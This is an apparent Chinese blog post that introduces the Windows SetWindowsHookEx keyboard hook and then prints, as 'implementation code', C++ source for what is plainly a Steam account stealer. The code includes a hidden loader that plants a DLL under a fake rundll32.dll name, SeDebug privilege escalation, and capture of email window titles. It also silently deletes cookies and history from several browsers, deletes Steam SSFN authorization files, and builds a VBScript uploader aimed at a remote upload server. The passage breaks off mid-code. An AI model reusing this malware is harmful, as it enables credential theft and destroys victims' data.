简介
SetWindowsHookEx 钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。
钩子实际上是一个处理消息的程序段,通过系统调用,把它挂入系统。每当特定的消息发出,在没有到达目的窗口前,钩子程序就先捕获该消息,亦即钩子函数先得到控制权。这时钩子函数即可以加工处理(改变)该消息,也可以不作处理而继续传递该消息,还可以强制结束消息的传递。在窗口消息的处理流程插队加入自己的处理函数。
在Ring3级下,SetWindowsHookEx 这个函数能够实现优先拦截提交给特定窗口的信息,并进行拦截者需要的处理,然后再提交给窗口函数或是下一个钩子函数,函数第一个参数为idHook,需要设置钩子的类型,在以下代码样例中我们选择安装的钩子类型为WH_GETMESSAGE,用来拦截WM_KEYDOWN键盘信息。
函数原型:
SetWindowsHookEx(//钩子类型_In_ int idHook,//回调函数地址_In_ HOOKPROC lpfn,//实例句柄(包含有钩子函数)_In_opt_ HINSTANCE hmod,//线程ID,欲勾住的线程(为0则不指定,全局)_In_ DWORD dwThreadId);设置Hook类型如下:
| 宏值 | 含义 |
|---|---|
| WH_MSGFILTER | 截获用户与控件交互的消息 |
| WH_KEYBOARD | 截获键盘消息 |
| WH_GETMESSAGE | 截获从消息队列送出的消息 |
| WH_CBT | 截获系统基本消息,激活,建立,销毁,最小化,最大化,移动,改变尺寸等窗口事件 |
| WH_MOUSE | 截获鼠标消息 |
| WH_CALLWNDPROCRET | 截获目标窗口处理完毕的消息 |
返回值:
若此函数执行成功,则返回值就是该挂钩处理过程的句柄;若此函数执行失败,则返回值为NULL(0)。若想获得更多错误信息,请调用GetLastError函数。
实现代码
以下是部分实现代码,忘了是啥年代写的,没啥技术含量,大佬可以忽略。
主程序:
// Steam.cpp : Defines the entry point for the application.
/#include "stdafx.h"// 函数声明LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);// 程序入口点int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{// TODO: Place code here.//加密标识CString Error = "****** 2019.04.07";MSG msg;HWND hWnd;char szTitle[]="Rainbow"; // The title bar textchar szWindowClass[]="RBTools"; // The title bar textWNDCLASSEX wcex={0};wcex.cbSize = sizeof(WNDCLASSEX); //WNDCLASSEX结构体大小wcex.style = CS_HREDRAW | CS_VREDRAW; //位置改变时重绘wcex.lpfnWndProc = (WNDPROC)WndProc; //消息处理函数wcex.hInstance = 0; //当前实例句柄wcex.hbrBackground = (HBRUSH)COLOR_WINDOWFRAME; //背景色wcex.lpszClassName = szWindowClass; //参窗口类名wcex.hIcon =0; //图标wcex.hCursor =0; //光标wcex.lpszMenuName =0; //菜单名称wcex.hIconSm =0; //最小化图标RegisterClassEx(&wcex); //注册窗口类hWnd = CreateWindow(szWindowClass, szTitle, WS_DISABLED, //创建窗口CW_USEDEFAULT,CW_USEDEFAULT, 1, 1, NULL, NULL, 0, NULL);if (!hWnd){return FALSE;}ShowWindow(hWnd, 0);UpdateWindow(hWnd);char szDllPath1[MAX_PATH] = { 0 };GetSystemDirectory(szDllPath1, sizeof(szDllPath1));strcpy(szDllPath1+2, "\\Program Files\\Common Files\\rundll32.dll");static HINSTANCE hinstDLL1;typedef void (CALLBACK *inshook1)();//定义回调函数的地址 inshook1 instkbhook1;if(hinstDLL1=LoadLibrary((LPCTSTR)szDllPath1)){instkbhook1=(inshook1)GetProcAddress(hinstDLL1, "installhook"); instkbhook1();}while (GetMessage(&msg, NULL, 0, 0)) // 消息循环:{TranslateMessage(&msg); //转化虚拟按键到字符消息DispatchMessage(&msg); //分派消息调用回调函数}return msg.wParam;
}LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{switch (message) {case WM_DESTROY: //窗口销毁消息PostQuitMessage(0);break;default:return DefWindowProc(hWnd, message, wParam, lParam);}return 0;
}HOOK DLL:
// test3.cpp : Defines the initialization routines for the DLL.
//#include "stdafx.h"
#include "test3.h"#define DllExport _declspec(dllexport)#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif#define SWEEP_BUFFER_SIZE 10000//合并区段
//#pragma comment(linker, "/MERGE:.rdata=.data")
//#pragma comment(linker, "/MERGE:.text=.data")
//#pragma comment(linker, "/MERGE:.reloc=.data")//共享区段
#pragma data_seg(".SHARDAT")#pragma data_seg()//设置区段属性
#pragma comment(linker, "/section:.SHARDAT,RWE")//
// 用户数据 ////// 到期时间 //CString UserEndData = "2019.05.04"; ////
//
// 配置数据// 用户 IDCString strUserID = "002";// 程序版本CString szVersion = "20190407_3";// 统计接口CString strServerName = "http://login.37wan.com/";// 邮箱 & 上传接口CString strMailServerName = "http://upload.37wan.com/";//char osx[MAX_PATH]={0};
char jsj[MAX_PATH]={0};CString szLocalLP = "";
CString szAccount = "";
CString myEmailSTR = "";
CString szMyselfPath = "";
CString szStr = "", szStr2 = "";
CString szMailID, szMailName, szMailAddr;
CString szRegExe, szSTPath, szSTFile, szOneUser, szRegUser, szRegUser2, szStrFirst, szStrSecon; BOOL Login = false;
BOOL Regedit = false;
BOOL szBrowser = false;
BOOL szIERegedit = false;
BOOL szEMailName = false;
BOOL szTslgameEXE = false;HWND hcaretWnd = NULL;
static HANDLE thread = NULL;HINSTANCE hins = NULL;
static HHOOK hkb = NULL;HINSTANCE hinss = NULL;
static HHOOK hie = NULL;static char TAB_BASE64[]={"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"};//
// Note!
//
// If this DLL is dynamically linked against the MFC
// DLLs, any functions exported from this DLL which
// call into MFC must have the AFX_MANAGE_STATE macro
// added at the very beginning of the function.
//
// For example:
//
// extern "C" BOOL PASCAL EXPORT ExportedFunction()
// {
// AFX_MANAGE_STATE(AfxGetStaticModuleState());
// // normal function body here
// }
//
// It is very important that this macro appear in each
// function, prior to any calls into MFC. This means that
// it must appear as the first statement within the
// function, even before any object variable declarations
// as their constructors may generate calls into the MFC
// DLL.
//
// Please see MFC Technical Notes 33 and 58 for additional
// details.
///
// CTest3AppBEGIN_MESSAGE_MAP(CTest3App, CWinApp)//{{AFX_MSG_MAP(CTest3App)// NOTE - the ClassWizard will add and remove mapping macros here.// DO NOT EDIT what you see in these blocks of generated code!//}}AFX_MSG_MAP
END_MESSAGE_MAP()// 提升程序系统权限BOOL DllExport AdjustPrivileges()
{HANDLE hToken = NULL;TOKEN_PRIVILEGES tp = {0};TOKEN_PRIVILEGES oldtp = {0};DWORD dwSize = sizeof(TOKEN_PRIVILEGES);LUID luid = {0};if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {if (GetLastError()==ERROR_CALL_NOT_IMPLEMENTED)return TRUE;elsereturn FALSE;}if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) {CloseHandle(hToken);return FALSE;}tp.PrivilegeCount=1;tp.Privileges[0].Luid = luid;tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;/* Adjust Token Privileges */if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), &oldtp, &dwSize)) {CloseHandle(hToken);return FALSE;}// close handlesCloseHandle(hToken);return TRUE;
}// 设置当前进程优先级为最高(实时)BOOL DllExport SetRealTimePriority()
{if ( !SetPriorityClass( GetCurrentProcess(), REALTIME_PRIORITY_CLASS ) ){return FALSE;}return TRUE;
}// 数据加密int DllExport tranasci(char a)
{return (a-'A'+65);
}CString DllExport gen(CString m_url)
{int i=0;int l=0;int k=0;CString curl;l=m_url.GetLength();for(i;i<l;i+=2){char temp1=m_url.GetAt( i );char temp2=m_url.GetAt(i+1);if(temp2==NULL){int ansi1=tranasci(temp1);CString str1;str1.Format("%X",ansi1);str1.Replace("FFFFFF", "");//curl+="%";curl+=str1;break;}int ansi1=tranasci(temp1);int ansi2=tranasci(temp2);CString str1;CString str2;str1.Format("%X",ansi1);str2.Format("%X",ansi2);str1.Replace("FFFFFF", "");str2.Replace("FFFFFF", "");//curl+="%";curl+=str1;//curl+="%";curl+=str2;}if (l%2){}else{
// curl+="%";}return curl;
}CString DllExport BASE64Encode(CString strIn, long Len)
{ CString strOut,strTemp; BYTE chr[3]; char chrBs[5]; long lTemp,lTemp2; chrBs[4]='\0'; strOut=""; if(Len<1) { return strOut; } for (lTemp=0;lTemp<Len/3;lTemp++) { lTemp2=lTemp*3; chr[0]=(BYTE)strIn.GetAt(lTemp2); chr[1]=(BYTE)strIn.GetAt(lTemp2+1); chr[2]=(BYTE)strIn.GetAt(lTemp2+2); chrBs[0]=(chr[0]>>2)&0x3F; chrBs[1]=((chr[0]<<4)|(chr[1]>>4))&0x3F; chrBs[2]=((chr[1]<<2)|(chr[2]>>6))&0x3F; chrBs[3]=chr[2]&0x3F; chrBs[0]=TAB_BASE64[chrBs[0]]; chrBs[1]=TAB_BASE64[chrBs[1]]; chrBs[2]=TAB_BASE64[chrBs[2]]; chrBs[3]=TAB_BASE64[chrBs[3]]; strOut+=chrBs; } if (1==Len%3) { chr[0]=(BYTE)strIn.GetAt(Len-1); chrBs[0]=(chr[0]>>2)&0x3F; chrBs[1]=(chr[0]<<4)&0x3F; chrBs[0]=TAB_BASE64[chrBs[0]]; chrBs[1]=TAB_BASE64[chrBs[1]]; chrBs[2]='='; chrBs[3]='='; strOut+=chrBs; } else if (2==Len%3) { chr[0]=(BYTE)strIn.GetAt(Len-2); chr[1]=(BYTE)strIn.GetAt(Len-1); chrBs[0]=(chr[0]>>2)&0x3F; chrBs[1]=((chr[0]<<4)|(chr[1]>>4))&0x3F; chrBs[2]=(chr[1]<<2)&0x3F; chrBs[0]=TAB_BASE64[chrBs[0]]; chrBs[1]=TAB_BASE64[chrBs[1]]; chrBs[2]=TAB_BASE64[chrBs[2]]; chrBs[3]='='; strOut+=chrBs; } return strOut;
} // 获取随机名称CString DllExport GetName()
{CString mySTR1 = "", mySTR2 = "";time_t seed = time(NULL); srand((unsigned)seed);for(int j=0; j<6 ;j++){int randNum = rand()%26;//取一个随机数,该数字为0-25if(j%2){mySTR1.Format("%C", randNum+97);//随机数为0到25,而小写字母的asc码为97到122,所以加97}else{mySTR1.Format("%C", randNum+65);//随机数为0到25,而大写字母的asc码为65到90,所以加65}mySTR2 += mySTR1;Sleep(100);//sleep一下,使随机因子取的分散些}return mySTR2;
}// 结束进程BOOL DllExport KillProcess(CString szProcess)
{BOOL szKill = FALSE;PROCESSENTRY32 pe32;pe32.dwSize =sizeof(pe32);HANDLE hpro=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);if(hpro==INVALID_HANDLE_VALUE){ return szKill;}szProcess.MakeLower();BOOL nowrun=Process32First(hpro,&pe32);while(nowrun){CString szGetProcess;szGetProcess = pe32.szExeFile;szGetProcess.MakeLower();if(szGetProcess == szProcess){DWORD proid=pe32.th32ProcessID;HANDLE hprocess=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,proid);if(hprocess!=NULL){::TerminateProcess(hprocess,0);szKill = TRUE;}::CloseHandle(hprocess);}nowrun=::Process32Next(hpro,&pe32);}::CloseHandle(hpro);return szKill;
}// 获取 steam.exe 进程标识DWORD DllExport GetEXE()
{HANDLE m_handle=::CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);PROCESSENTRY32* Info = new PROCESSENTRY32;Info->dwSize = sizeof(PROCESSENTRY32);if(::Process32First(m_handle,Info)){while(::Process32Next(m_handle,Info)!=FALSE){CString ss;ss=Info->szExeFile;ss.MakeLower();if(ss.Find("steam.exe") != -1){return Info->th32ProcessID;}}::CloseHandle(m_handle);if(Info){delete Info;}}return -1;
}// 查找进程BOOL DllExport GetProcess(CString TargetName)
{ CString fileName(TargetName);fileName.MakeLower(); //转为小写 HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); // 创建快照句柄 PROCESSENTRY32 pe32x = {sizeof(PROCESSENTRY32),0};//定义一个PROCESSENTRY32结类型的变量 if( Process32First(hShot,&pe32x) ) {do{CString process_fileName = pe32x.szExeFile;process_fileName.MakeLower();//进程文件名转换为小写if( fileName == process_fileName ){CloseHandle(hShot);return TRUE;}}while( Process32Next(hShot, &pe32x) );} CloseHandle(hShot);return FALSE;
}// 枚举顶层窗口获取标题BOOL DllExport CALLBACK EnumWindowsProc(HWND hWnd, LPARAM lParam)
{if( GetParent(hWnd)==NULL && IsWindowVisible(hWnd) ){TCHAR sTitle[MAX_PATH]={0};ZeroMemory(sTitle, MAX_PATH * sizeof(TCHAR));GetWindowText(hWnd, sTitle, sizeof(sTitle));//SendMessage(hWnd, WM_GETTEXT, (WPARAM)MAX_PATH, (LPARAM)sTitle);//AfxMessageBox(sTitle);CString szMainName = "";szMainName.Format(TEXT("%s"), sTitle);int MAIL0 = szMainName.Find("邮箱大全", 0);char *MAIL1;MAIL1 = strstr(sTitle, "邮箱");char *MAIL2;MAIL2 = strstr(sTitle, "电子邮");char *MAIL3;MAIL3 = strstr(sTitle, "免费邮");char *MAIL4;MAIL4 = strstr(sTitle, "电子邮件");char *MAIL5;MAIL5 = strstr(sTitle, "手机统一");char *MAIL6;MAIL6 = strstr(sTitle, "Microsoft 帐户");char *MAIL7;MAIL7 = strstr(sTitle, "Yahoo -");if( MAIL0 == -1 && (MAIL1 || MAIL2 || MAIL3 || MAIL4 || MAIL5 || MAIL6 || MAIL7) ){HWND Hwnd_Browser = ::GetForegroundWindow();if(hWnd == Hwnd_Browser){if(!szEMailName){CString szACCID;szACCID.Format(TEXT("C:\\MailName.txt"));szMailName.Format(TEXT("%s"), sTitle);FILE *fps1;fps1=fopen(szACCID, "w");if(fps1){fprintf(fps1, "%s", szMailName.GetBuffer(0));}fclose(fps1);szEMailName = true;}//AfxMessageBox(szMailName);return FALSE;}}}return TRUE;
}// 获取 MACtypedef struct _ASTAT_
{ ADAPTER_STATUS adapt; NAME_BUFFER NameBuff[30];
}ASTAT, * PASTAT;UCHAR DllExport GetAddressByIndex(int lana_num,ASTAT & Adapter)
{UCHAR uRetCode; //-------------------------------------------------------------------NCB ncb; memset(&ncb, 0, sizeof(ncb) ); ncb.ncb_command = NCBRESET; ncb.ncb_lana_num = lana_num; //指定网卡号,首先对选定的网卡发送一个NCBRESET命令,以便进行初始化 uRetCode = Netbios(&ncb ); memset(&ncb, 0, sizeof(ncb) ); ncb.ncb_command = NCBASTAT; ncb.ncb_lana_num = lana_num;//指定网卡号 strcpy((char *)ncb.ncb_callname,"* " ); ncb.ncb_buffer = (unsigned char *)&Adapter; //指定返回的信息存放的变量 ncb.ncb_length = sizeof(Adapter); //接着,可以发送NCBASTAT命令以获取网卡的信息 uRetCode = Netbios(&ncb ); //-------------------------------------------------------------------return uRetCode;
}CString DllExport GetMacAddress(void)
{CString strMacAddress;//-------------------------------------------------------------------NCB ncb; UCHAR uRetCode;int num = 0;LANA_ENUM lana_enum; memset(&ncb, 0, sizeof(ncb) ); ncb.ncb_command = NCBENUM; ncb.ncb_buffer = (unsigned char *)&lana_enum; ncb.ncb_length = sizeof(lana_enum); //向网卡发送NCBENUM命令,以获取当前机器的网卡信息,如有多少个网卡//每张网卡的编号等 uRetCode = Netbios(&ncb);if (uRetCode == 0) {num = lana_enum.length;//对每一张网卡,以其网卡编号为输入编号,获取其MAC地址 for (int i = 0; i < num; i++){ASTAT Adapter;if(GetAddressByIndex(lana_enum.lana[i],Adapter) == 0){strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"), Adapter.adapt.adapter_address[0], Adapter.adapt.adapter_address[1], Adapter.adapt.adapter_address[2], Adapter.adapt.adapter_address[3], Adapter.adapt.adapter_address[4], Adapter.adapt.adapter_address[5]);}}}//-------------------------------------------------------------------return strMacAddress;
}// 获取 IE 版本CString DllExport GetIEVerSion()
{HKEY hKEY;CString myIEVersion = "";LPCTSTR data_Set = "SOFTWARE\\Microsoft\\Internet Explorer";long ret0=(RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY)); if(ret0 == ERROR_SUCCESS){LPBYTE owner_Get1=new BYTE[80];DWORD type_1=REG_SZ;DWORD cbData_1=80;long ret1=::RegQueryValueEx(hKEY, "svcVersion", NULL, &type_1, owner_Get1, &cbData_1); if(ret1 == ERROR_SUCCESS) { char *IEVersion = (char *)owner_Get1;myIEVersion.Format(TEXT("%s"), IEVersion);}else{LPBYTE owner_Get2=new BYTE[80];DWORD type_2=REG_SZ;DWORD cbData_2=80;long ret2=::RegQueryValueEx(hKEY, "Version", NULL, &type_2, owner_Get2, &cbData_2);if(ret2 == ERROR_SUCCESS) { char *IEVersion = (char *)owner_Get2;myIEVersion.Format(TEXT("%s"), IEVersion);}}}RegCloseKey(hKEY);return myIEVersion;
}// 获取系统位数BOOL DllExport IsWow64()
{typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);LPFN_ISWOW64PROCESS fnIsWow64Process;BOOL bIsWow64 = FALSE;fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress( GetModuleHandle("kernel32"),"IsWow64Process");if (NULL != fnIsWow64Process){fnIsWow64Process(GetCurrentProcess(),&bIsWow64);}return bIsWow64;
}// 获取系统版本void DllExport os()
{//先判断是否为 win8.1 或 win10typedef void(__stdcall*NTPROC)(DWORD*, DWORD*, DWORD*);HINSTANCE hinst = LoadLibrary("ntdll.dll");DWORD dwMajor, dwMinor, dwBuildNumber;NTPROC proc = (NTPROC)GetProcAddress(hinst, "RtlGetNtVersionNumbers"); proc(&dwMajor, &dwMinor, &dwBuildNumber); if (dwMajor == 6 && dwMinor == 3) //win 8.1{strcat(osx, "Win 8.1");}else if (dwMajor == 10 && dwMinor == 0) //win 10{strcat(osx, "Win 10");}else{//判断win8.1以下的版本SYSTEM_INFO info; //用SYSTEM_INFO结构判断64位AMD处理器 GetSystemInfo(&info); //调用GetSystemInfo函数填充结构 OSVERSIONINFOEX os;os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);#pragma warning(disable:4996)if (GetVersionEx((OSVERSIONINFO *)&os)){//下面根据版本信息判断操作系统名称 switch (os.dwMajorVersion){case 5:switch (os.dwMinorVersion){case 0:strcat(osx, "Win 2000");break;case 1:strcat(osx, "Win XP");break;case 2:if (os.wProductType == VER_NT_WORKSTATION &&info.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64)strcat(osx, "Win XP Professional x64 Edition");elsestrcat(osx, "Win Server 2003");break;}break;case 6:switch (os.dwMinorVersion){case 0:if (os.wProductType == VER_NT_WORKSTATION)strcat(osx, "Win Vista");elsestrcat(osx, "Win Server 2008");break;case 1:if (os.wProductType == VER_NT_WORKSTATION)strcat(osx, "Win 7");elsestrcat(osx, "Win Server 2008 R2");break;case 2:if (os.wProductType == VER_NT_WORKSTATION)strcat(osx, "Win 8");elsestrcat(osx, "Win Server 2012");break;}break;default:strcat(osx, "Unkonw OS");}}elsestrcat(osx, "Unkonw OS");}if(IsWow64()){strcat(osx, " x64");}else{strcat(osx, " x86");}
}// 清理缓存文件enum DEL_CACHE_TYPE //要删除的类型。
{File,//表示internet临时文件Cookie //表示Cookie
};BOOL DllExport DeleteUrlCache(DEL_CACHE_TYPE type)
{BOOL bRet = FALSE;HANDLE hEntry;LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL; DWORD dwEntrySize;//delete the filesdwEntrySize = 0;hEntry = FindFirstUrlCacheEntry(NULL, NULL, &dwEntrySize);lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];hEntry = FindFirstUrlCacheEntry(NULL, lpCacheEntry, &dwEntrySize);if (!hEntry){goto cleanup;}do{if (type == File &&!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY)){DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);}else if (type == Cookie &&(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY)){DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);}dwEntrySize = 0;FindNextUrlCacheEntry(hEntry, NULL, &dwEntrySize);delete [] lpCacheEntry; lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];}while (FindNextUrlCacheEntry(hEntry, lpCacheEntry, &dwEntrySize));bRet = TRUE;
cleanup:if (lpCacheEntry){delete [] lpCacheEntry; }return bRet;
}BOOL DllExport WipeFile(LPCTSTR szDir, LPCTSTR szFile)
{CString sPath;HANDLE hFile;DWORD dwSize;DWORD dwWrite;char sZero[SWEEP_BUFFER_SIZE];memset(sZero, 0, SWEEP_BUFFER_SIZE);sPath = szDir;sPath += _T('\\');sPath += szFile;hFile = CreateFile(sPath, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);if (hFile == INVALID_HANDLE_VALUE){return FALSE;}dwSize = GetFileSize(hFile, NULL);//skip file header (actually, I don't know the file format of index.dat)dwSize -= 64;SetFilePointer(hFile, 64, NULL, FILE_BEGIN);while (dwSize > 0){if (dwSize > SWEEP_BUFFER_SIZE){WriteFile(hFile, sZero, SWEEP_BUFFER_SIZE, &dwWrite, NULL);dwSize -= SWEEP_BUFFER_SIZE;}else{WriteFile(hFile, sZero, dwSize, &dwWrite, NULL);break;}}CloseHandle(hFile);return TRUE;
}BOOL DllExport EmptyDirectory(LPCTSTR szPath, BOOL bDeleteDesktopIni, BOOL bWipeIndexDat)
{WIN32_FIND_DATA wfd;HANDLE hFind;CString sFullPath;CString sFindFilter;DWORD dwAttributes = 0;sFindFilter = szPath;sFindFilter += _T("\\*.*");if ((hFind = FindFirstFile(sFindFilter, &wfd)) == INVALID_HANDLE_VALUE){return FALSE;}do{if (_tcscmp(wfd.cFileName, _T(".")) == 0 || _tcscmp(wfd.cFileName, _T("..")) == 0 ||(bDeleteDesktopIni == FALSE && _tcsicmp(wfd.cFileName, _T("desktop.ini")) == 0)){continue;}sFullPath = szPath;sFullPath += _T('\\');sFullPath += wfd.cFileName;//去掉只读属性dwAttributes = GetFileAttributes(sFullPath);if (dwAttributes & FILE_ATTRIBUTE_READONLY){dwAttributes &= ~FILE_ATTRIBUTE_READONLY;SetFileAttributes(sFullPath, dwAttributes);}if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY){EmptyDirectory(sFullPath, bDeleteDesktopIni, bWipeIndexDat);RemoveDirectory(sFullPath);}else{if (bWipeIndexDat && _tcsicmp(wfd.cFileName, _T("index.dat")) == 0){WipeFile(szPath, wfd.cFileName);}DeleteFile(sFullPath);}}while (FindNextFile(hFind, &wfd));FindClose(hFind);return TRUE;
}BOOL DllExport DelTempFiles()
{// 清理DNS缓存ShellExecute(NULL, "open", "ipconfig.exe", " /flushdns", NULL, SW_HIDE);// 清理 缓存 与 CookiesTCHAR szPath[MAX_PATH];DeleteUrlCache(Cookie);if (SHGetSpecialFolderPath(NULL, szPath, CSIDL_COOKIES, FALSE)){EmptyDirectory(szPath, 1, 1);}CString myCleaner = TEXT(" /c del /f /s /q \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\Microsoft\\Windows\\History\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\*.*\" && del /f /s /q \"%userprofile%\\Local Settings\\History\\*.*\" && del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\CookiesV3\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\History\" && exit");//AfxMessageBox(myCleaner);ShellExecute(NULL, "open", "cmd.exe", myCleaner, "", SW_HIDE);BOOL bResult = FALSE;BOOL bDone = FALSE;LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;DWORD dwTrySize, dwEntrySize = 4096; // start buffer sizeHANDLE hCacheDir = NULL;DWORD dwError = ERROR_INSUFFICIENT_BUFFER;do{switch (dwError){// need a bigger buffercase ERROR_INSUFFICIENT_BUFFER:delete [] lpCacheEntry;lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];lpCacheEntry->dwStructSize = dwEntrySize;dwTrySize = dwEntrySize;BOOL bSuccess;if (hCacheDir == NULL)bSuccess = (hCacheDir= FindFirstUrlCacheEntry(NULL, lpCacheEntry,&dwTrySize)) != NULL;elsebSuccess = FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize);if (bSuccess)dwError = ERROR_SUCCESS;else{dwError = GetLastError();dwEntrySize = dwTrySize; // use new size returned}break;// we are donecase ERROR_NO_MORE_ITEMS:bDone = TRUE;bResult = TRUE;break;// we have got an entrycase ERROR_SUCCESS:// don't delete cookie entryif (!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);// get ready for next entrydwTrySize = dwEntrySize;if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize))dwError = ERROR_SUCCESS;else{dwError = GetLastError();dwEntrySize = dwTrySize; // use new size returned}break;// unknown errordefault:bDone = TRUE;break;}if (bDone){delete []lpCacheEntry;if (hCacheDir)FindCloseUrlCache(hCacheDir);}} while (!bDone);return TRUE;
}// 删除授权文件模块BOOL DllExport SearchFilesByWildcard_1(LPCTSTR wildcardPath, LPCTSTR wildcardPathandFile)
{HANDLE hFile = INVALID_HANDLE_VALUE;WIN32_FIND_DATA pNextInfo;CString mySSFNFiles = "";hFile = FindFirstFile(wildcardPathandFile, &pNextInfo);if(INVALID_HANDLE_VALUE == hFile){return FALSE;}if(pNextInfo.cFileName[0] != '.'){mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);DeleteFile(mySSFNFiles);}while(FindNextFile(hFile, &pNextInfo)){if(pNextInfo.cFileName[0] == '.'){continue;}mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);DeleteFile(mySSFNFiles);}return FALSE;
}// 上传 并 删除 授权文件模块BOOL DllExport SearchFilesByWildcard_2(LPCTSTR wildcardPath, LPCTSTR wildcardPathandFile)
{HANDLE hFile = INVALID_HANDLE_VALUE;WIN32_FIND_DATA pNextInfo;CString myLP;CString myVBSFilePath;CString mySSFNFiles = "", myTXTSSFNFiles = "", mySSFNFilesName = "";myLP = szLocalLP;CString myUploadVBS = "";myUploadVBS += "Class XMLUpload \r\n";myUploadVBS += "Private xmlHttp \r\n";myUploadVBS += "Private objTemp \r\n";myUploadVBS += "Private adTypeBinary, adTypeText \r\n";myUploadVBS += "Private strCharset, strBoundary \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Sub Class_Initialize() \r\n";myUploadVBS += "adTypeBinary = 1 \r\n";myUploadVBS += "adTypeText = 2 \r\n";myUploadVBS += "Set xmlHttp = CreateObject(\"Msxml2.XMLHTTP\") \r\n";myUploadVBS += "Set objTemp = CreateObject(\"ADODB.Stream\") \r\n";myUploadVBS += "objTemp.Type = adTypeBinary \r\n";myUploadVBS += "objTemp.Open \r\n";myUploadVBS += "strCharset = \"utf-8\" \r\n";myUploadVBS += "strBoundary = GetBoundary() \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Sub Class_Terminate() \r\n";myUploadVBS += "objTemp.Close \r\n";myUploadVBS += "Set objTemp = Nothing \r\n";myUploadVBS += "Set xmlHttp = Nothing \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Function StringToBytes(ByVal strData, ByVal strCharset) \r\n";myUploadVBS += "Dim objFile \r\n";myUploadVBS += "Set objFile = CreateObject(\"ADODB.Stream\") \r\n";myUploadVBS += "objFile.Type = adTypeText \r\n";myUploadVBS += "objFile.Charset = strCharset \r\n";myUploadVBS += "objFile.Open \r\n";myUploadVBS += "objFile.WriteText strData \r\n";myUploadVBS += "objFile.Position = 0 \r\n";myUploadVBS += "objFile.Type = adTypeBinary \r\n";myUploadVBS += "If UCase(strCharset) = \"UNICODE\" Then \r\n";myUploadVBS += "objFile.Position = 2 'delete UNICODE BOM \r\n";myUploadVBS += "ElseIf UCase(strCharset) = \"UTF-8\" Then \r\n";myUploadVBS += "objFile.Position = 3 'delete UTF-8 BOM \r\n";myUploadVBS 